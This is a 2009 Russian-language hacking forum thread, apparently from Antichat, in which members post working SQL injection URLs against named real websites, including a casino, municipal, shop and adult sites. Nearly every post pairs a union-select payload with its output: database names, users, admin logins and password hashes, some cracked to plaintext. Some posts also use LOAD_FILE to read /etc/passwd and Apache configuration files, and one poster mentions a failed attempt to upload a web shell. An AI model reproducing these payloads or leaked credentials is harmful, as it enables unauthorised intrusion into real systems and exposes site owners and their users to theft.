
21.02.2009, 20:13
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
2ПаВлУшКа
Там идет басик авторизация(может кто уже воткнул).
PR-6 www.irma-grenoble.com
PHP код:
http://www.irma-grenoble.com/04risques_isere/00commune_photos.php?NumeroINSEE=-1)+union+select+1,concat_ws(0x3A,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
irma38@localhost:4.1.19:irma38_communes
PR-4 www.solverde.pt
PHP код:
http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,concat_ws(0x3A,user,password,host,file_priv),6+from+mysql.user+limit+5,1--
phpuser:341d6ca146c27aa7:localhost:Y
PHP код:
http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6--
Конфиг апача
PHP код:
http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),6--
Последний раз редактировалось AkyHa_MaTaTa; 21.02.2009 в 20:54..
|
|
|

04.03.2009, 13:58
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Код:
http://www.easysexporn.com/view.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
4.1.22-standard:xxxhome_easysexporn:xxxhome_easysex@local host
Код:
http://www.sexyshop.com.ve/articulos.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4--
5.0.67-COMMUNITY-LOG:ECLECTIC_SHOPSE:ECLECTIC_SHOP1@LOCALHOST
|
|
|

28.03.2009, 16:55
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
laguia.us
Вобщем все банально, скуль:
Код:
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11/*&edicion=93
revistalaguia@localhost:revistalaguia:5.0.45
т.к. мускул 5 смотрим с помощью INFORMATION_SCHEMA названия таблиц и полей
admuser-login,password
Код:
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,10,11+FROM+admusers/*&edicion=93
admin:2cad00b70163edcf: calvin79
админка
Код:
http://www.laguia.us/admin/
Залить шелл не удалось =\
|
|
|

02.04.2009, 23:14
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
http://dornerworks.com/?p=news&id=-1+union+select+1,2,3--
Database Version: 5.0.67-community
Database name: pigvomit_dnwwebsite
User name: pigvomit_dorner@localhost
http://egyco-egypt.com/English/newsdetail.php?ID=-15+union+select+1,2,3,4--
Database Version: 5.0.77-community
Database name: egycoeg_egyco
User name: egycoeg_egyco@localhost
Login: egico
Pass:egico1
http://www.line.com.ua/magazin.php?id=-1+union+select+1,2,3--
Database Version: 5.0.51a-community
Database name: abook_line
User name: abook_linecom@localhost
Около 350 юзеров! Выводить всех юзеров не стал =)
http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.68-log
Database name: mistelle
User name: mistelle@10.0.75.182
Юзеры: http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,use rname),6,7+from+pun_users--
http://www.geotek.co.uk/site/scripts/news.php?id=-1+union+select+1,2,3,4,5,6--
Database Version: 4.0.24_Debian-10sarge2
Database name: geotekmain
User name: geotekmain@localhost
http://www.ecop.org.ph/news.php?id=-99+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: ecoporg_db
User name: ecoporg_user@localhost
http://windsurfing-by.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
Database Version: 5.0.32-Debian_7etch6-log
Database name: windsurf_com
User name: windsurf_user@localhost
http://www.dflvwclub.de/cars.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Database Version: 5032-debian_7etch8-log
Database name: aa34
User name: aa34@localhost
Login: admin
Pass: d9c4b5ac3b13e92e26b4e025586d8a8d : dflit
Выводить юзеров с форума с таблы phorum_users
Последний раз редактировалось .:[melkiy]:.; 02.04.2009 в 23:33..
Причина: Добавил
|
|
|

11.04.2009, 18:07
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.tvog.ru/novinki.php?id=34+UNION+SELECT+1,2,3,4,5,6,7,8
Database Version: 4.1.25
Database name: tvog
User name: tvog@localhost
|
|
|

13.04.2009, 01:31
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
goon.ru - Pr-4 ТиЦ 2100
PHP код:
http://goon.ru/o/msg_view.htm?m_id=-1+union+select+1,2,3,4,5,concat_ws(user(),version(),database()),7,8,9--+
goon_top@localhost:5.0.51a-community-log:goon_top
|
|
|

20.04.2009, 15:39
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
rsc.ca
SQL -
Код:
http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,2,3,4,5+--+
Инклуд(3 символа=\ варианта нет) в 3 поле и вывод во 2...
Код:
http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5+--+
rsc@localhost:rsc:4.0.27
|
|
|

08.05.2009, 21:24
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами:
9318329
Репутация:
394
|
|
http://www.remsoft.ca {PR 5}
Код:
http://www.remsoft.ca/news.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
4.1.22-community-nt-log : remsoft : remsoft@WSH-004
|
|
|

22.05.2009, 00:30
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12--
5.0.67-log:u156180@10.10.227.61:u156180
http://moraru.ru/prod.php?id_product=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 +from+information_schema.tables--
большое количество таблиц, около 300.
там нашел таблицу: b_user
http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,10,11,12+from+b_user--
admin:Iq{28kX{10d8e0838e85fcc17ccd06fe9eb9af4f
PR 2, ТИЦ 10
|
|
|

01.06.2009, 12:21
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Сообщение от mailbrush
Нету тут инъекции.
Код:
http://www.multikov.net/master.php?article=-1'+union+select+1,concat(version(),':',database(),':',user()),3,4,5--%200
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|